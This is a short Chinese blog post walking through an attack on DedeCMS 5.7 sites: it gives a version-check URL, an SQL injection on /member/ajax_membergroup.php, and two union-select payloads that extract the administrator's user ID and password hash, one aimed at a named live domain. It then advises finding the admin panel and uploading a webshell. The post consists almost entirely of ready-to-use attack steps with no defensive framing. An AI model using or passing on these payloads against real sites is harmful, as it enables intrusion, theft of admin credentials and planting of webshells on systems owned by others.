织网5.7的漏洞 可任意文件上传

思路:访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传马子

过程:

查看网站的版本

code 区域

cms /data/admin/ver.txt

查看是否有"朋友 修改",有则存在注入

code 区域

/member/ajax_membergroup.php?action=post&membergroup=1

帐号

code 区域

http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `#@__admin` where 1 or id=@`'`

去掉前三位和最后一位,得到管理员密码

code 区域

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `#@__admin`

然后~~~~你们都懂


分享本文至:

发表留言:

站长seo搜索引擎优化常用指令大全 微信之又弹了xss...思路666
返回顶部